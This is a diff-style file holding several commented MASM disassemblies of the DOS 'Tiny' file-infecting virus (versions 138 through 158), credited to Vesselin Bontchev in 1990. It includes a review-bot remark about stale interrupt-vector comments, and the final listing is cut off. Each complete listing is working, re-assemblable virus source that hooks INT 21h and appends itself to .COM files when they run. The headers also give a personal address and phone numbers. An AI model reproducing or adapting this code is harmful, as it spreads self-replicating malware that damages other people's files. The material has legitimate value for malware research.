mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
inc si ; Add 1 to file size for the JMP
|
||||
xchg ax,si ; Move it in AX
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
xchg ax,dx ; Zero AX
|
||||
call lseek ; Seek to the beginning
|
||||
int 69 ; AH is 40h, write the JMP instruction
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Seek operation
|
||||
cwd ; Zero DX
|
||||
do_int21:
|
||||
xor cx,cx ; External entry for Open
|
||||
int 69
|
||||
mov cl,4 ; 4 bytes will be read/written
|
||||
xchg ax,si ; Store AX in SI
|
||||
mov ax,4060 ; Prepare AH for Write
|
||||
xor di,di ; Zero DI
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
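Review bot: The comment on `mov bx,int_21-first4+seg_60` says BX points at the new INT 13h handler, but `int_21` is the INT 21h handler that the vector-swap loop installs, and the comment block before that loop says the old handler is moved to INT 32h while the code uses vector 69h throughout (`es:[di-(69-21)*4]`, `int 69`, `jmp dword ptr cs:[69*4]`, and the neighbouring remark that DI equals 69h*4). Suggest `mov bx,int_21-first4+seg_60 ; Point BX at new INT 21h handler` and `; Move the INT 21h handler to INT 69h and`. The same two stale comments appear in the TINY-138 and TINY-143 listings below; the TINY-154, TINY-156 and TINY-158 listings, which do use INT 32h, have comments consistent with their code.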
@ -0,0 +1,168 @@
|
|||
page ,132
|
||||
name TINY138
|
||||
title The 'Tiny' virus, version TINY-138
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-138 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
call do_int21
|
||||
jc end_exec ; Exit on error
|
||||
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx,si ; Save handle in BX
|
||||
mov ds,ax ; Set DS and ES to 60h,
|
||||
mov es,ax ; the virus data segment
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes
|
||||
int 69
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek ; SI now contains the file size
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
int 69 ; Append the virus to the file (AH is now 40h)
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
inc si ; Add 1 to file size for the JMP
|
||||
xchg ax,si ; Move it in AX
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
xchg ax,dx ; Zero AX
|
||||
call lseek ; Seek to the beginning
|
||||
int 69 ; AH is 40h, write the JMP instruction
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 69
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Seek operation
|
||||
cwd ; Zero DX
|
||||
do_int21:
|
||||
xor cx,cx ; External entry for Open
|
||||
int 69
|
||||
mov cl,4 ; 4 bytes will be read/written
|
||||
xchg ax,si ; Store AX in SI
|
||||
mov ax,4060 ; Prepare AH for Write
|
||||
xor di,di ; Zero DI
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,174 @@
|
|||
page ,132
|
||||
name TINY143
|
||||
title The 'Tiny' virus, version TINY-143
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-143 º
|
||||
; º Disassembled by Vesselin Bontchev, August 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 69
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
call lseek1 ; Lseek to file beginning (and set CL to 4)
|
||||
|
||||
mov al,seg_60 shr 4 ; Read the first 4 bytes of the file
|
||||
mov ds,ax ; Set buffer offset to 0060:0000h
|
||||
mov es,ax ; Point ES there too
|
||||
mov ah,3F
|
||||
int 69 ; Do read
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
xor di,di
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file (and put 4 in CL)
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append the virus to the file
|
||||
int 69 ; Do it
|
||||
|
||||
call lseek1 ; Seek to the file beginning
|
||||
|
||||
xchg ax,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40 ; Overwrite the first 4 bytes of the file
|
||||
int 69 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 69
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek1:
|
||||
mov al,0 ; Lseek to the file beginning
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 69 ; Do it
|
||||
|
||||
mov cl,4 ; Put 4 in CL
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,182 @@
|
|||
page ,132
|
||||
name TINY154
|
||||
title The 'Tiny' virus, version TINY-154
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-154 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
call lseek1
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
call lseek1 ; Seek to the file beginning
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
lseek1:
|
||||
mov al,0 ; Lseek to file beginning
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dh,6 ; Put 6 in DH and 4 in CL
|
||||
mov cl,4
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,182 @@
|
|||
page ,132
|
||||
name TINY156
|
||||
title The 'Tiny' virus, version TINY-156
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-156 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
mov al,0
|
||||
call lseek
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov al,0 ; Seek to the file beginning
|
||||
call lseek
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dh,6 ; Put 6 in DH and 4 in CL
|
||||
mov cl,4
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,178 @@
|
|||
page ,132
|
||||
name TINY158
|
||||
title The 'Tiny' virus, version TINY-158
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-158 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
